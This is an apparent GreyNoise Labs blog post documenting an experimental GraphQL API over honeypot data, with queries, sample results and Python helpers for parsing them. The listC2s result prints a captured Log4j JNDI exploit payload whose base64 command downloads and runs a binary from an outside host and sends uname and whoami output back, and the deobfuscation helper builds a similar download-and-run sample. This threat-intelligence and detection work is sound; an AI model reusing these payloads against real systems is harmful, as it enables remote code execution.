Labs GraphQL API

Experimental GraphQL API that exposes snippets of the GreyNoise data lake
api
cybersecurity
graphql
Author

Matt Lehman

Published

April 19, 2023

This is an experimental blueprint service available at https://api.labs.greynoise.io. It is an authenticated GraphQL API that exposes queries over snippets of the GreyNoise data lake, which opens up new possibilities for what can be built on that data.

We’re excited to see how our users will engage with this data and discover new use cases. To get started, you’ll need to sign up for a GreyNoise account here to authenticate to the Labs API.

For the latest queries and examples, make sure to check out our comprehensive documentation.

Please note that this is a blueprint and not intended for direct use in production or critical workflows. We haven't released any client SDKs at this time, but schema introspection is enabled, so anyone with an account can pull the full schema and quickly build their own experimental tools. It also means the live schema, rather than this post, is the authoritative description of what the API accepts and returns.

Ready to dive in? Click Here to get started.

Availability

This is a free, experimental API. There are no guarantees about its availability, performance, or longevity. New queries will ship with a scheduled deprecation date, recorded in the documentation, so the team can keep adding functionality and judge which of it is useful enough to warrant promotion to a production endpoint or query.

Limits

For each available query, this API returns only a percentage of the most useful results, not the full data set. The API is also rate limited; the current limits are recorded on the documentation site, and clients should expect to be throttled if they exceed them.
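The two practical consequences of the paragraphs above, introspection being enabled and requests being rate limited, can be handled by a very small client. The one below is an added example and not GreyNoise code: it runs the standard introspection query to enumerate the top-level queries the schema exposes, and retries on HTTP 429 while honouring Retry-After. Two things are assumptions that the post does not state and the documentation should be checked for: that the token is sent as a bearer token in the Authorization header, and that the GraphQL endpoint is the base URL itself. The transport is injectable so the logic can be exercised without network access.

```python
"""Minimal client for the Labs GraphQL API: lists top-level queries via
introspection and backs off when rate limited. Added example, not GreyNoise code."""
import json
import time
import urllib.error
import urllib.request

# Base URL from the post. ASSUMPTION: the GraphQL endpoint lives at this URL;
# adjust to the path given in the documentation if it differs.
LABS_URL = "https://api.labs.greynoise.io"

# Introspection is enabled on the service, so this standard GraphQL query
# returns every top-level query field together with its arguments.
INTROSPECT_QUERIES = """
query ListQueries {
  __schema {
    queryType {
      fields {
        name
        description
        args { name type { name kind ofType { name } } }
      }
    }
  }
}
"""


class GraphQLError(Exception):
    """HTTP failure, exhausted rate-limit retries, or a non-empty `errors` array."""


def http_post(url, body, headers):
    """Real transport: POST the JSON body, return (status, response headers, raw bytes)."""
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=30) as resp:
            return resp.status, dict(resp.headers), resp.read()
    except urllib.error.HTTPError as err:
        return err.code, dict(err.headers), err.read()


def run_query(query, token, variables=None, *, transport=http_post, url=LABS_URL,
              max_attempts=4, sleep=time.sleep):
    """Send one GraphQL operation and return its `data`; retry on HTTP 429."""
    body = json.dumps({"query": query, "variables": variables or {}}).encode()
    headers = {
        "Content-Type": "application/json",
        "Accept": "application/json",
        # ASSUMPTION: bearer-token style authentication header.
        "Authorization": f"Bearer {token}",
    }
    delay = 1.0
    for _ in range(max_attempts):
        status, resp_headers, raw = transport(url, body, headers)
        if status == 429:
            # Rate limited: honour a numeric Retry-After, otherwise back off exponentially.
            retry_after = next((v for k, v in resp_headers.items() if k.lower() == "retry-after"), None)
            try:
                wait = float(retry_after) if retry_after is not None else delay
            except ValueError:  # Retry-After given as an HTTP date; fall back to our own delay
                wait = delay
            sleep(wait)
            delay *= 2
            continue
        if status == 401:
            raise GraphQLError("token rejected; log back into the Playground for a fresh one")
        if status != 200:
            raise GraphQLError(f"HTTP {status}: {raw[:200]!r}")
        doc = json.loads(raw)
        if doc.get("errors"):
            # GraphQL reports validation and resolver problems with HTTP 200 plus an errors array.
            raise GraphQLError("; ".join(e.get("message", "?") for e in doc["errors"]))
        return doc["data"]
    raise GraphQLError(f"still rate limited after {max_attempts} attempts")


def list_queries(token, **kwargs):
    """Return {query_name: [argument names]} for every top-level query in the schema."""
    data = run_query(INTROSPECT_QUERIES, token, **kwargs)
    return {f["name"]: [a["name"] for a in f["args"]]
            for f in data["__schema"]["queryType"]["fields"]}


if __name__ == "__main__":
    import os
    # ASSUMPTION: the Playground token is exported in this environment variable.
    for name, args in list_queries(os.environ["GREYNOISE_LABS_TOKEN"]).items():
        print(f"{name}({', '.join(args)})")
```

Because the token is a credential that expires, keep it in the environment rather than in scripts or shell history, and treat a 401 as "log back in", not as a reason to retry.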

Queries

Currently this API exposes three primary sources of data. The request and response formats are likely to change somewhat during this first release as we tune them, so treat the generated documentation linked above as authoritative over any example in this article.

Possible C2s

A list of possible command-and-control (C2) servers observed in payloads, along with the domains and IPs extracted from each payload, the original payload itself, and metadata about these potential C2s that gives context on pervasiveness and rate.

QUERY

query listC2s {
  listC2s {
    c2_domains
    c2_ips
    hits
    payload
    pervasiveness
    source_ip
  }
}

RESULTS (truncated)

{
  "source_ip": "95.214.55.244",
  "c2_domains": [
    "[]"
  ],
  "c2_ips": [
    "[129.151.84.124]"
  ],
  "hits": 2599,
  "payload": "GET / HTTP/1.1\r\nAccept: application/json, text/plain, */*\r\nX-Api-Version: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTM0LjY1LjYyLjY0Ly5kdWNrL3VwZGF0ZXIgOyBjdXJsIC1PIGh0dHA6Ly8xMzQuNjUuNjIuNjQvLmR1Y2svdXBkYXRlciA7IGNobW9kICt4IHVwZGF0ZXIgOyBjaG1vZCA3NzcgdXBkYXRlciA7IC4vdXBkYXRlciBydW5uZXIgOyBzdWRvIC4vdXBkYXRlciBydW5uZXIgOyBybSAtcmYgdXBkYXRlcjsgY3VybCBodHRwOi8vMTI5LjE1MS42NC41NS9hcmNoLyQodW5hbWUgLW0pL3VzZXIvJCh3aG9hbWkpOyBzdWRvIGN1cmwgaHR0cDovLzEyOS4xNTEuNjQuNTUvYXJjaC8kKHVuYW1lIC1tKS91c2VyLyQod2hvYW1pKQ==}')\r\nUser-Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTM0LjY1LjYyLjY0Ly5kdWNrL3VwZGF0ZXIgOyBjdXJsIC1PIGh0dHA6Ly8xMzQuNjUuNjIuNjQvLmR1Y2svdXBkYXRlciA7IGNobW9kICt4IHVwZGF0ZXIgOyBjaG1vZCA3NzcgdXBkYXRlciA7IC4vdXBkYXRlciBydW5uZXIgOyBzdWRvIC4vdXBkYXRlciBydW5uZXIgOyBybSAtcmYgdXBkYXRlcjsgY3VybCBodHRwOi8vMTI5LjE1MS42NC41NS9hcmNoLyQodW5hbWUgLW0",
  "pervasiveness": 18
}
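The payload in the result above is a JNDI lookup string of the kind sent against Log4j (CVE-2021-44228): `${env:NaN:-j}`-style default-value lookups hide the `jndi:ldap://` prefix, and the LDAP path carries a base64-encoded shell command. The extracted `c2_ips` entry is the LDAP host. The following is an added example, not GreyNoise code, showing how to recover that information from the `payload` field yourself: it resolves the obfuscating lookups, pulls out each distinct JNDI URI, and decodes the command. The sample payload is constructed here to mirror the structure of the one above, using documentation address ranges rather than the real addresses.

```python
"""Resolve Log4j-style lookup obfuscation in a listC2s payload and extract the C2.
Added example, not GreyNoise code; the sample payload is constructed."""
import base64
import binascii
import re

# Innermost ${...} lookup: its body contains no '$', '{' or '}'.
LOOKUP = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/:}]+)(?::(\d+))?(/[^}]*)?\}", re.IGNORECASE)
B64_SEGMENT = re.compile(r"/Base64/([A-Za-z0-9+/=]+)")


def _resolve(match):
    """Return the literal a single lookup would expand to.
    ${env:NaN:-j} expands to the default 'j' (variable NaN is unset);
    ${lower:X} / ${upper:X} recase X; the final ${jndi:...} is kept for extraction."""
    body = match.group(1)
    if body.lower().startswith("jndi:"):
        return match.group(0)
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, _, rest = body.partition(":")
    if prefix.lower() == "lower":
        return rest.lower()
    if prefix.lower() == "upper":
        return rest.upper()
    return match.group(0)  # unknown lookup: leave untouched


def deobfuscate(text):
    """Resolve innermost lookups repeatedly until the string stops changing."""
    prev = None
    while prev != text:
        prev, text = text, LOOKUP.sub(_resolve, text)
    return text


def decode_command(path):
    """Decode the base64 command in a .../Command/Base64/<b64> path, or None."""
    m = B64_SEGMENT.search(path)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def extract_c2(payload):
    """Return one record per distinct JNDI URI found in the payload."""
    seen, records = set(), []
    for m in JNDI.finditer(deobfuscate(payload)):
        scheme, host, port, path = m.group(1).lower(), m.group(2), m.group(3), m.group(4) or ""
        key = (scheme, host, port, path)
        if key in seen:  # the same URI is usually repeated across several headers
            continue
        seen.add(key)
        records.append({
            "scheme": scheme,
            "host": host,
            "port": int(port) if port else None,
            "path": path,
            "command": decode_command(path),
        })
    return records


# Constructed sample (not real traffic): same obfuscation as the row above,
# repeated in two headers, carrying a simple download-and-run command.
SAMPLE_COMMAND = "wget http://203.0.113.10/.x/updater ; chmod +x updater ; ./updater runner"
_B64 = base64.b64encode(SAMPLE_COMMAND.encode()).decode()
SAMPLE_PAYLOAD = (
    "GET / HTTP/1.1\r\n"
    "X-Api-Version: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}"
    "//203.0.113.5:1389/TomcatBypass/Command/Base64/" + _B64 + "}')\r\n"
    "User-Agent: ${${lower:j}ndi:${lower:l}${lower:d}ap://203.0.113.5:1389"
    "/TomcatBypass/Command/Base64/" + _B64 + "}\r\n"
)

if __name__ == "__main__":
    for record in extract_c2(SAMPLE_PAYLOAD):
        print(record)
```

Resolving innermost lookups first is what makes the nesting tricks fall apart: each pass turns `${env:NaN:-j}` into `j` until only the outer `${jndi:...}` remains, which is then matched directly. The second-stage download hosts inside the decoded command (which is what the `c2_domains` and `c2_ips` fields summarise) are only visible after that decode.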

HTTP Requests

An aggregation of HTTP request paths, bodies, and user agents, along with metadata about these requests that gives context on a payload's pervasiveness and rate.

QUERY

query HTTPRequests {
  listHTTPRequests {
    date
    method
    path
    pervasiveness
    request_headers
    request_count
    source_ip_count
  }
}

RESULTS (truncated)

{
  "data": {
    "listHTTPRequests": [
      {
        "date": "2023-04-14",
        "method": "GET",
        "path": "/hudson",
        "pervasiveness": 100,
        "request_headers": "[Accept:*/*, Accept-Encoding:gzip, User-Agent:Mozilla/5.0 zgrab/0.x]",
        "request_count": 3063,
        "source_ip_count": 146
      },
      {
        "date": "2023-04-14",
        "method": "GET",
        "path": "/",
        "pervasiveness": 100,
        "request_headers": "[Accept:*/*, Accept-Encoding:gzip, User-Agent:Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)]",
        "request_count": 18023,
        "source_ip_count": 54
      }
    ]
  }
}
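Note that `request_headers` comes back as a single string of the form `[Name:value, Name:value]`, and `listC2s` returns `c2_domains` and `c2_ips` the same way (a list containing bracketed strings), so a consumer has to parse these rather than treat them as JSON arrays. The following added example, not GreyNoise code, does that for both queries and flattens a `listHTTPRequests` row into something a notebook or detection pipeline can use; the `requests_per_source` field is my own derived value, not one the API returns. It handles the one real edge case, a header value that itself contains `, ` (an Accept list, or a URL after a comma), and is tested against the two rows shown above plus constructed inputs.

```python
"""Normalize stringified list fields from listHTTPRequests and listC2s rows.
Added example, not GreyNoise code."""
import re

# An RFC 7230 token followed by ':' starts a new header, unless it is a URL
# scheme such as 'https://' that follows a comma inside a header value.
HEADER_START = re.compile(r"^[A-Za-z0-9!#$%&'*+.^_`|~-]+:(?!//)")


def parse_bracket_list(text):
    """'[a, b]' -> ['a', 'b']; '[]' -> []."""
    text = text.strip()
    if text.startswith("[") and text.endswith("]"):
        text = text[1:-1]
    return [item for item in text.split(", ") if item]


def parse_header_list(text):
    """Parse the stringified header list into ordered (name, value) pairs.
    A comma only starts a new header when the next piece looks like 'Name:';
    otherwise it belongs to the previous value (Accept: text/html, */*;q=0.8)."""
    headers = []
    for piece in parse_bracket_list(text):
        if HEADER_START.match(piece) or not headers:
            name, _, value = piece.partition(":")
            headers.append([name, value])
        else:
            headers[-1][1] += ", " + piece
    return [(name, value) for name, value in headers]


def c2_addresses(row):
    """listC2s wraps its lists one level further: c2_ips is a list of bracketed strings."""
    return {
        "domains": [d for s in row.get("c2_domains", []) for d in parse_bracket_list(s)],
        "ips": [ip for s in row.get("c2_ips", []) for ip in parse_bracket_list(s)],
    }


def normalize_row(row):
    """Flatten one listHTTPRequests row for a detection or notebook pipeline."""
    headers = dict(parse_header_list(row["request_headers"]))
    return {
        "date": row["date"],
        "method": row["method"],
        "path": row["path"],
        "user_agent": headers.get("User-Agent", ""),
        "accept": headers.get("Accept", ""),
        "pervasiveness": row["pervasiveness"],
        "request_count": row["request_count"],
        "source_ip_count": row["source_ip_count"],
        # Derived here, not an API field: a few sources hammering one path reads
        # very differently from the same volume spread across a large botnet.
        "requests_per_source": round(row["request_count"] / max(row["source_ip_count"], 1), 1),
    }


if __name__ == "__main__":
    # The two rows from the response above.
    sample_rows = [
        {"date": "2023-04-14", "method": "GET", "path": "/hudson", "pervasiveness": 100,
         "request_headers": "[Accept:*/*, Accept-Encoding:gzip, User-Agent:Mozilla/5.0 zgrab/0.x]",
         "request_count": 3063, "source_ip_count": 146},
        {"date": "2023-04-14", "method": "GET", "path": "/", "pervasiveness": 100,
         "request_headers": "[Accept:*/*, Accept-Encoding:gzip, User-Agent:Mozilla/5.0 "
                            "(compatible; CensysInspect/1.1; +https://about.censys.io/)]",
         "request_count": 18023, "source_ip_count": 54},
    ]
    for r in sample_rows:
        print(normalize_row(r))
    print(c2_addresses({"c2_domains": ["[]"], "c2_ips": ["[129.151.84.124]"]}))
```

The split-then-merge approach is deliberately conservative: a piece is only promoted to a new header when it starts with a header token and a colon, so `Accept` lists and `http(s)://` fragments stay attached to the value they belong to.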

Helpful Hints

You can clear out the existing query and then navigate to the query explorer on the left hand side and create a new query with point & click.

[Screenshot: the query explorer panel]

If you prefer to live in the CLI you can use Copy as cURL on the left hand side under the tool panel. Treat the copied command as a secret: it embeds your current authentication header, which expires after a set period of time, so keep it out of shared scripts and shell history. When it expires, log back into the API to get a new one.

[Screenshot: the Copy as cURL option]

After a query finishes in the Playground you can download the JSON results on the bottom right.

[Screenshot: the JSON download button]